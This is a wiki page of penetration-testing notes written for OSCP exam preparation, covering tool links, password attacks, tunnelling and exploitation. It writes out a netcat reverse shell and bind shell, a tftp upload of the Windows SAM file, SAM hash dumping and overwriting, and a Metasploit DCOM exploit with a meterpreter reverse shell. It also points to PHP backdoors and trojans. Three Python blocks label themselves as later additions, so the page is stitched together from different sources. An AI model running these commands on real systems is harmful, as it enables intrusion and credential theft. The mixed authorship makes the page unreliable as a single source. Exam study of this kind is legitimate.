Hacking Notes

From Bitbull Wiki

disclaimer

I wrote these notes while preparing myself for the "Offensive Security Certified Professional" exam.
scripts, links and info on this site are for educational purposes only.
a knife is not bad, but you can do bad things with it.
I hope this site helps others to improve their security skills.
enjoy it ...

security sites

Offensive Security
security trainings, creators of backtrack linux
homepage: http://www.offensive-security.com
SecurityFocus
official collection of vulns
homepage: http://www.securityfocus.com
darknet
useful audit tools
homepage: http://www.darknet.org.uk
CVE
Common Vulnerabilities and Exposures
homepage: http://cve.mitre.org/
insecure
top 100 security tools, and lot of other info and tools
homepage: http://sectools.org

protecting privacy while surfing

distributed network to hide your web access
also known as tor proxy
homepage: http://www.anonymox.net/

lists of free proxy servers

http://proxy.speedtest.at/proxyOnlyAnonymous.php
http://www.hidemyass.com/proxy-list
http://www.google.com/search?q=anonymous+proxy+server+list
for i in $(cat proxy.txt)   # one proxy per line, as host:port
do
   # print only the proxies that answer an http request within 5 seconds
   curl -m5 -x $i http://www.bitbull.ch/wanip.php >/dev/null 2>&1 && echo "$i"
done

anonym emailing

one time email addresses
http://www.mailinator.com
http://www.yopmail.com
https://www.guerrillamail.com

information gathering

using google

google advanced search operators
http://www.googleguide.com/advanced_operators.html
google hacking database, a nice place
http://www.hackersforcharity.org/ghdb/
http://www.exploit-db.com/google-dorks/

tools

web

./cms-explorer.pl -url http://mybooks.ch -type drupal

./revhosts pig getmail stiftung-buehl.ch
./revhosts pig Findsubdomains stiftung-buehl.ch
./revhosts pig vhh bitbull.ch #find all virtual hosts on this server



online domains databases
MAC address vendor directory
homepage: http://standards.ieee.org/regauth/oui/index.shtml
file: http://standards.ieee.org/regauth/oui/oui.txt
find all active ips in a subnet
arp-scan -I eth0 192.168.1.0/24

scanning

nmap
excellent port scanner, always up to date
homepage: http://nmap.org
install nmap by rpm: rpm -Uhv http://nmap.org/dist/$(curl -s http://nmap.org/dist/ | egrep 'nmap-[1-9].*i386.rpm' | cut -d\" -f6 | tail -1)
install nmap frontend zenmap by: rpm -Uhv http://nmap.org/dist/$(curl -s http://nmap.org/dist/ | grep zenmap | cut -d\" -f6 | tail -1)
autoscan
cool scanner, has a nice and easy customizable extension interface
homepage: http://sourceforge.net/projects/autoscan/
nessus
great security scanner, must have
homepage: http://www.nessus.org
nikto
Nikto is a web server scanner which performs comprehensive tests against web servers for multiple security items.
homepage: http://www.cirt.net/code/nikto.shtml

password attacking

bruteforce tools

hydra
remote bruteforce password cracker for nearly all protocols :)
homepage: http://freeworld.thc.org/releases.php
rainbow tables
crack hashes faster by using rainbow tables
see: http://en.wikipedia.org/wiki/Rainbow_table
web interface: http://cracker.offensive-security.com/

password lists

wyd
generates word lists from given web content
homepage: http://www.remote-exploit.org/codes_wyd.html
bugmenot
free user accounts for many sites
homepage: http://www.bugmenot.com
some password lists
http://www.milw0rm.com/mil-dic.php
ftp://ftp.ox.ac.uk/pub/wordlists/
http://gdataonline.com/downloads/GDict/
http://www.theargon.com/achilles/wordlists/
http://theargon.com/achilles/wordlists/theargonlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://www.outpost9.com/files/WordLists.html
http://www.securinfos.info/wordlists_dictionnaires.php
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.insidepro.com/eng/download.shtml
http://www.word-list.com/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
http://wordlist.sourceforge.net/

password dumper

pwdump
dump windows passwords
see: http://en.wikipedia.org/wiki/Pwdump

physical access

linux
  • boot backtrack3
  • copy, read, write /etc/shadow
  • use john the ripper to crack it
get windows password hashes
  • boot backtrack3
  • mount ntfs filesystem
mount
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
  • dump the syskey bootkey from windows system hive
bkhive /mnt/hda1/WINNT/system32/config/system system.txt
  • dump password hashes
samdump2 /mnt/hda1/WINNT/system32/config/SAM system.txt > hashes.txt
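The hashes.txt written by samdump2 above is in pwdump format. Before feeding it to john it is worth reading the dump itself, because several findings need no cracking at all. The following Python is an added example, not code from this wiki or from the samdump2/pwdump projects; it assumes the usual pwdump line layout user:RID:LM-hash:NT-hash::: and reports blank passwords, LM hashes that are still stored, and accounts sharing one NT hash (password reuse). The two empty-password hash constants are public knowledge; every other hash value in the sample is constructed.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty password (public constants, not values from this page)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Assumed line layout of hashes.txt (pwdump format): user:RID:LM-hash:NT-hash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_pwdump(text):
    """Parse pwdump-format text into a list of dicts; blank lines are skipped,
    anything else that does not match the layout raises ValueError."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not pwdump format: {line!r}")
        user, rid, lm, nt = m.groups()
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def audit(entries):
    """Findings a defender wants before (or instead of) cracking anything:
    blank passwords, LM hashes still stored, and password reuse across accounts."""
    findings = []
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "blank password"))
        else:
            by_nt[e["nt"]].append(e["user"])
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], "LM hash stored (rainbow-table crackable)"))
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((",".join(users), "same NT hash, password reuse"))
    return findings


# Constructed sample dump: every hash except the two empty-password constants is made up
SAMPLE_HASHES = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy_svc:1001:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::

backup:1002:aad3b435b51404eeaad3b435b51404ee:89abcdef0123456789abcdef01234567:::
"""

if __name__ == "__main__":
    for user, problem in audit(parse_pwdump(SAMPLE_HASHES)):
        print(f"{user}: {problem}")
```

Run it as is to see the three findings for the sample; for a real hashes.txt, read the file and pass its contents to parse_pwdump. An LM hash other than the empty one means the old LAN Manager hash is still being stored for that account, which is exactly what the rainbow tables mentioned above break quickly.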
set windows passwords
  • boot backtrack3
  • mount ntfs filesystem
mount
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
  • write new password
chntpw /mnt/hda1/WINNT/system32/config/SAM

arp poisoning

ettercap
nice cli/gui tool for arp poisoning, man in the middle, dns poisoning, traffic modification ...
homepage: http://ettercap.sourceforge.net/
cain and abel
windows tool like ettercap, windows guys like it
homepage: http://www.oxid.it/

traffic analyzer

wireshark
well known gui/cli traffic analyzer, also imports tcpdump files
homepage: http://www.wireshark.org/
tcpdump
console traffic analyzer
homepage: http://sourceforge.net/projects/tcpdump/
iftop
tool to monitor and trace bandwidth issues
homepage: http://www.ex-parrot.com/~pdw/iftop/
WebScarab
great http traffic analyzer
homepage: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
WebGoat
insecure webapp to teach security lessons
homepage: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

port forwarding

ssh reverse tunnel
#build the ssh reverse tunnel
user@destination$ ssh -R 2222:localhost:22 middleuser@middle
user@destination$ ssh -N -f -R 2222:localhost:22 middleuser@middle #same, but no shell (-N) and in the background (-f)
#connect to the ssh reverse tunnel and jump to destination
middleuser@middle$ ssh destinationuser@localhost -p2222
user@notebook$ ssh destinationuser@middle -p 2222 #only works if sshd on middle has GatewayPorts enabled


ssh port forwarding
ssh -g -L 80:127.0.0.1:3128 jump@zen.bitbull.ch -p23
ssh -g -L local_port:remote_host:remote_port  user@dst_host -p23
  -g  >  Allows remote hosts to connect to local forwarded ports
  -L  >  [bind_address:]port:host:hostport
  -p  >  use different port for ssh connection
rinetd

simple port forwarder for linux and windows
homepage: http://www.boutell.com/rinetd/
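To show what a rinetd rule or `ssh -L local_port:remote_host:remote_port` does at the TCP level, here is an added Python example; it is not code from this wiki, from rinetd or from OpenSSH. A small Forwarder class accepts on a local port and relays each connection to a target, and a constructed local service stands in for the remote side (the proxy on port 3128 in the ssh example above). The bind_addr parameter plays the role of -g: 127.0.0.1 is ssh's default, 0.0.0.0 exposes the forwarded service to every host that can reach the machine, which is why -g is off by default.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then close dst's write side."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class Forwarder:
    """rinetd-style TCP forwarder: accept on bind_addr:port and relay each
    connection to target, i.e. what `ssh -L port:host:hostport` gives you
    locally. bind_addr="127.0.0.1" matches ssh's default; "0.0.0.0" is -g."""

    def __init__(self, target, bind_addr="127.0.0.1", port=0):
        self.target = target
        self.forwarded = 0
        self.listener = socket.socket()
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((bind_addr, port))   # port 0: let the OS pick one
        self.listener.listen(5)
        self.port = self.listener.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:
                return                      # listener closed
            self.forwarded += 1
            try:
                upstream = socket.create_connection(self.target, timeout=5)
                upstream.settimeout(None)
            except OSError:
                client.close()              # target down: drop the client
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    def close(self):
        self.listener.close()


def start_sample_service():
    """Constructed stand-in for the remote service: greets with a banner,
    echoes one message back, hangs up. Returns (listening socket, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(b"SAMPLE-SERVICE 1.0\r\n")
                data = conn.recv(4096)
                if data:
                    conn.sendall(b"echo: " + data)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def relay_roundtrip(message=b"hello through the tunnel\r\n"):
    """Talk to the sample service only via the forwarder's local port and
    return (everything the service answered, number of relayed connections)."""
    srv, service_port = start_sample_service()
    fwd = Forwarder(("127.0.0.1", service_port))   # ~ ssh -L <fwd.port>:127.0.0.1:<service_port>
    try:
        with socket.create_connection(("127.0.0.1", fwd.port), timeout=5) as c:
            c.sendall(message)
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks), fwd.forwarded
    finally:
        fwd.close()
        srv.close()


if __name__ == "__main__":
    reply, count = relay_roundtrip()
    print(reply.decode(), "connections relayed:", count)
```

The forwarder never looks at the bytes it relays, which is also the point of the stunnel note below: anything that is plaintext on the wire stays plaintext through rinetd, while the ssh variant encrypts the hop between the two ssh endpoints only.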

stunnel

traffic redirection via ssl tunnel
homepage: http://www.stunnel.org/
e.g.: MUA -> localhost:110 -> stunnel( localhost:110 -> destination:995)

proxytunnel

building tunnels over http proxies for ssh, pop3 ...
homepage: http://proxytunnel.sourceforge.net/

ssh reverse tunnel example

1) add user account on jumphost

root@jumphost:~# useradd support1
root@jumphost:~# passwd support1

2) send login and host data to external supporter

  TO: supporter@external-support.com
  Subject: we need support ... now !!!
  ---
  hi mate
  our production webserver is broken, I'll pick you up on the internet at 09:00
  we meet here:
  ssh support1@jumphost.internet.com
  # PW: secr3t.
  start this command: screen -S support1
  ---

3) go and pickup the waiting supporter at jumphost

 me@blackhole:~$ ssh -R 2222:localhost:22 support1@jumphost.internet.com
 # PW: think
 support1@jumphost:~$ screen -ls # list all screen sessions
 support1@jumphost:~$ screen -x support1 # pick up the supporter (shared screen)
 support1@jumphost:~$ ssh -p2222 me@localhost # take you and supporter back to blackhole (by reverse tunnel)
 me@blackhole:~$ ssh admin@crapy
 admin@crapy:~$ sudo su -
 root@crapy:~# echo "now, its your turn, fix the server ..."

4) when the work is done: close the tunnel. if you are not sure, do this:

root@jumphost:~# usermod -L support1 # lock the account
root@jumphost:~# pkill -9 -u support1 # be sure all sessions are killed

this is the network map for the example above:
http://www.bitbull.ch/dl/pics/SSH-ReverseTunnel.png

exploiting

milw0rm
good collection of exploits and hacking background
homepage: http://www.milw0rm.com/
metasploit
great exploiting framework
homepage: http://www.metasploit.com/
install framework3 on FC6: http://www.bitbull.ch/dl/scripts/install-framework3-fc6.sh

use db_autopwn

./msfconsole
msf> load db_sqlite3
msf> db_create
msf> db_nmap -sV -PN -T4 192.168.0.111
msf> db_autopwn -t
nmap -iL /root/ip.txt -PN -T4 -sV --host-timeout 5min -p21,22,25,80,135,139,110,143,445,443 -oX /tmp/scan.xml

use msfconsole

./msfconsole
msf > search exploits rpc
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > search payloads windows.*reverse
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set RHOST 192.168.0.111
msf exploit(ms03_026_dcom) > set LHOST 192.168.0.151
msf exploit(ms03_026_dcom) > set LPORT 55555
msf exploit(ms03_026_dcom) > set

Global
======

No entries in data store.

Module: windows/dcerpc/ms03_026_dcom
====================================

  Name                             Value                                                     
  ----                             -----                                                     
  AutoLoadStdapi                   true                                                      
  AutoRunScript                                                                              
  ConnectTimeout                   10                                                        
  DCERPC::ReadTimeout              0                                                         
  DCERPC::fake_bind_multi          true                                                      
  DCERPC::fake_bind_multi_append   0                                                         
  DCERPC::fake_bind_multi_prepend  0                                                         
  DCERPC::max_frag_size            4096                                                      
  DCERPC::smb_pipeio               rw                                                        
  DLL                              /pentest/exploits/framework3/data/meterpreter/metsrv.dll  
  EXITFUNC                         thread                                                    
  EnableContextEncoding            false                                                     
  LHOST                            192.168.0.151                                           
  LPORT                            55555                                                     
  PAYLOAD                          windows/meterpreter/reverse_tcp                           
  RHOST                            192.168.0.111                                           
  RPORT                            135                                                       
  SSL                              false                                                     
  TARGET                           0                                                         
  TCP::max_send_size               0                                                         
  TCP::send_delay                  0                                                         
  WfsDelay                         0                                                         

msf exploit(ms03_026_dcom) > exploit

backdoors

php

some nice backdoors for unix, php
google: c99.txt r57.txt c100.txt
http://www.google.ch/search?hl=de&q=c99.txt+r57.txt+c100.txt+filetype%3Atxt

windows trojans

optix pro / beast / bifrost
some interesting windows trojans
spybot
irc based trojan
insider
http based trojan, takes instructions by web server
rxbot
irc based, self distributing

misc tools

Back Track Linux Distro
live linux distro for security audit
http://www.remote-exploit.org/backtrack.html
chkrootkit
locally check for root kits
homepage: http://www.chkrootkit.org/
darkc0de
interesting tools and scripts
http://darkc0de.com/
Lynis
check default config and security settings on unix box
homepage: http://www.rootkit.nl/projects/lynis.html

netcat notes

simple chat
dst) nc -vv -l 4444
src) nc 192.168.8.110 4444
file transfer
dst) nc -l 4444 > chris.leo
src) cat chris.leo | nc 192.168.9.10 4444
src) type chris.leo | nc.exe 192.168.9.10 4444
bind shell
dst) nc -l 4444 -e cmd
src) nc 192.168.8.110 4444
reverse shell
dst) nc -l 4444
src) nc -e cmd 192.168.8.110 4444
port scanner
nc -z -w1  -v 192.168.9.10 4444-4445
banner grabber
nc -vv 192.168.9.110 22
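The last two netcat lines, the port scanner and the banner grabber, are simple enough to rebuild, and doing so shows what they look like from the other side: a connect scan is just one TCP handshake per port with no payload, and a banner grab only records what the service volunteers before the client says anything. The following Python is an added example, not code from this wiki or from netcat; the stand-in service on 127.0.0.1 is constructed so the block runs offline, and its banner string is made up.

```python
import socket
import threading


def start_banner_service(banner=b"SSH-2.0-Sample_Banner\r\n"):
    """Constructed stand-in for the sshd on port 22 in the note: on each
    connection it sends its banner and hangs up. Returns (socket, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))          # port 0: the OS picks a free one
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                  # listener closed
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def scan_ports(host, first, last, timeout=1.0):
    """What `nc -z -w1 -v host first-last` does: one TCP connect per port, no
    payload, a one second wait each; returns the ports that accepted."""
    open_ports = []
    for port in range(first, last + 1):
        s = socket.socket()
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            open_ports.append(port)
        except OSError:
            pass                        # refused or timed out: closed/filtered
        finally:
            s.close()
    return open_ports


def grab_banner(host, port, timeout=2.0, max_bytes=1024):
    """What `nc -vv host port` shows first: whatever the service volunteers
    before the client speaks (sshd, smtp, ftp do; http does not)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(max_bytes)
        except socket.timeout:
            return b""                  # service waits for the client to speak


def demo():
    """Run both against the local stand-in service and return the results."""
    srv, port = start_banner_service()
    try:
        return {
            "port": port,
            "open": scan_ports("127.0.0.1", port, port + 1),
            "banner": grab_banner("127.0.0.1", port),
        }
    finally:
        srv.close()


if __name__ == "__main__":
    r = demo()
    print("open:", r["open"], "banner:", r["banner"])
```

Because every probe completes the handshake, a connect scan is noisy: each port shows up as an accepted connection with no data in the service's own logs, which is the pattern to look for on the defending side. The banner is the reason to keep version strings minimal on exposed services.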

tftp notes

get files (-i is only for win)
tftp -i 1.2.3.4 GET nc.exe
put files (-i is only for win)
tftp 2.3.4.5 PUT sam



wireless

links

web conversion
convert wpa and wep key into words
homepage: http://www.latinsud.com/wepconv.html
aircrack-ng faq
a must
homepage: http://aircrack-ng.org/doku.php?id=faq